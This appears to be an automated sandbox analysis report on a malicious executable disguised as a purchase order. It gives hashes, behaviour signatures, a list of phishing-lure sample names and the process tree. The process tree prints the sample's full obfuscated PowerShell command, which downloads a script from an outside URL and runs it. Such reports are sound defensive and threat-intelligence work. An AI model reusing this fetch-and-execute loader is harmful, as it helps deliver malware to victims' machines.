Analysis
- max time kernel: 120s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 23-12-2024 21:57
Static task
- static1

Behavioral tasks (task: sample, resource)
- behavioral1: IoC/00496083.xls, win7-20240903-en
- behavioral2: IoC/00496083.xls, win10v2004-20241007-en
- behavioral3: IoC/680589798891.xls, win7-20240903-en
- behavioral4: IoC/680589798891.xls, win10v2004-20241007-en
- behavioral5: Consignment Document.pdf.exe, win7-20240729-en
- behavioral6: Consignment Document.pdf.exe, win10v2004-20241007-en
- behavioral7: DHL SHIPMENT NOTIFICATION 284748395PD.exe, win7-20240708-en
- behavioral8: DHL SHIPMENT NOTIFICATION 284748395PD.exe, win10v2004-20241007-en
- behavioral9: EZ0496.exe, win7-20241023-en
- behavioral10: EZ0496.exe, win10v2004-20241007-en
- behavioral11: IoC/I055170_06975755.xls, win7-20240903-en
- behavioral12: IoC/I055170_06975755.xls, win10v2004-20241007-en
- behavioral13: IoC/I795405_33242211.xls, win7-20241010-en
- behavioral14: IoC/I795405_33242211.xls, win10v2004-20241007-en
- behavioral15: New Order 00027748585 02222022.exe, win7-20240729-en
- behavioral16: New Order 00027748585 02222022.exe, win10v2004-20241007-en
- behavioral17: $PLUGINSDIR/Math.dll, win7-20241010-en
- behavioral18: $PLUGINSDIR/Math.dll, win10v2004-20241007-en
- behavioral19: $PLUGINSDIR/System.dll, win7-20240708-en
- behavioral20: $PLUGINSDIR/System.dll, win10v2004-20241007-en
- behavioral21: Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll, win10v2004-20241007-en
- behavioral22: systeminfo.exe, win10v2004-20241007-en
- behavioral23: wecutil.exe, win10v2004-20241007-en
- behavioral24: New order 003848848575 02162022.exe, win7-20240903-en
- behavioral25: New order 003848848575 02162022.exe, win10v2004-20241007-en
- behavioral26: PO_#YBIC3892900183902328_Evaluated Copy.exe, win7-20241023-en
- behavioral27: PO_#YBIC3892900183902328_Evaluated Copy.exe, win10v2004-20241007-en
- behavioral28: Payment Advice for Outstanding Invoices (2).exe, win7-20240903-en
- behavioral29: Payment Advice for Outstanding Invoices (2).exe, win10v2004-20241007-en
- behavioral30: IoC/XSG8996380.xls, win7-20240903-en
- behavioral31: IoC/XSG8996380.xls, win10v2004-20241007-en
General
- Target: New order 003848848575 02162022.exe
- Size: 6KB
- MD5: ec11df1acf1ce25da6daad0453d92f02
- SHA1: a3eb5d8f63e6f6cc15445002d8deb7be47fd013a
- SHA256: b8043f0e196bc7742dfe211a10481ddf844442a3c135de465494bdd619546ce3
- SHA512: 5271f51a9b89e5748e32dfdc1b302d968ecd0085d82cb1a0c1e9b867244599687051f1770798789db4e4fc9591953d4d734f3ab0a2b641fcb989880932ab779c
- SSDEEP: 96:WRkWOfaeOVMwsO4JdjC/oI0HIGrqW0zNt:dDBlJJDISIib+
Malware Config
- Extracted: http://spa2o.com/H99.jpg
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow 6, pid 2292, powershell.exe
  flow 7, pid 2292, powershell.exe
  flow 8, pid 2292, powershell.exe
- Hide Artifacts: Ignore Process Interrupts (1 TTPs, 1 IoCs)
  Command interpreters often include specific commands/flags that ignore errors and other hangups.
  pid 2292, powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid 2292, powershell.exe
- Suspicious use of AdjustPrivilegeToken (21 IoCs)
  pid 2292, powershell.exe; tokens: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- Suspicious use of WriteProcessMemory (3 IoCs)
  PID 1044 wrote to memory of 2292; pid 1044, New order 003848848575 02162022.exe, procid_target 28 (3 identical entries)
Processes
- Level 1: C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe (PID 1044)
  Command line: "C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2292)
    Command line: powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
    Signatures: Blocklisted process makes network request; Hide Artifacts: Ignore Process Interrupts; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken